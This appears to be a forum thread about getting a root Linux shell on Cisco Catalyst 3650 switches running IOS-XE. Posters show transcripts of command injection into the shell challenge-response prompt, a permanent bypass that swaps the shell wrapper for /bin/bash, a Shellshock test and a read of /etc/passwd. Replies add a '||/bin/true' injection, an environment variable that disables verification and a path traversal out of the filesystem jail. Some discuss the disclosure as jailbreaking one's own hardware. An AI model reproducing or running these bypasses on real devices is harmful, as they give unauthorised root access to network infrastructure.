Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
I remember being able to get through to the shell by entering something trivial like '/bin/sh' instead. I am sure it wasn't a dream but i clearly remember i didn't write it down because i'm foolish like that..
So how do i drop into bash from IOS-XE on a Cisco Catalyst 3650?
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
AHA SO WE HAVE STDERR, but not STDOUT..
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed
Alright then, let's go again. More, code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS config hugepages lic0 rommon_to_env sys webui
RP_0_0_cli crashinfo include lic1 root tftp
auto dev install lkern_init sbin tmp
bin drec0 isan misc selinux ucode0
bsn epc issu mnt share usr
chasfs etc lib obfl0 space var
common flash lib32 proc spi vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]
Cisco please don't fix this or i will never ever upgrade this image.
A silly one:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
Uh.. netcat is there. I'm starting to have second thoughts if posting this on open waters is a good idea..
[code] Catalyst-3650#request system shell Activity within this shell can jeopardize the functioning of the system. Are you sure you want to continue? [y/n] y Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..] Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.): /bin/sh Key verification failed [/code]
What did you do to fix the "Key verification failed" error situation?
[EXTRA] Building a toolchain for:
[EXTRA] build = x86_64-unknown-linux-gnu
[EXTRA] host = x86_64-unknown-linux-gnu
[EXTRA] target = mips-unknown-elf
bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
Stay tuned. Returning next week. Holidays.
---- In other news.
Please enter the shell access response based on the above
challenge (Press "Enter" when done or to quit.):
`sh 1>&2`
sh-3.2# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
First i got rid of the annoying RSA challenge altogether.
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: a99bac81d1ea605579e81d1d5[..]
Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.):
`bash -c "mv /usr/binos/bin/shell_wrapper /tmp/ohboy; ln -s /bin/bash /usr/binos/bin/shell_wrapper; exit"`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
[Switch:/]$ whoami ; uname -a
root
Linux Switch 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
I wish you hadn't gone public with this, so rest of us could have enjoyed our extra debugging toolset. It's quite easy to fix this so that linux shell stops working.
So when you request shell following thing happens:
a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images) b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and return 0 if it is valid, other wise c) so anything like ||/bin/true will work just fine
shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment
mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc
You have to have access to the device already to call the linux CLI. I'd compare it to 'jailbreak', you're getting access to the system you already paid for, access you should have had to begin with.
Some other IOS-XE platforms have not restricted the access. IOS-XR still allows openly access to QNX shell. JunOS still allows access to FreeBSD shell (albeit binaries are signed for few years now, which hurt legit use-cases).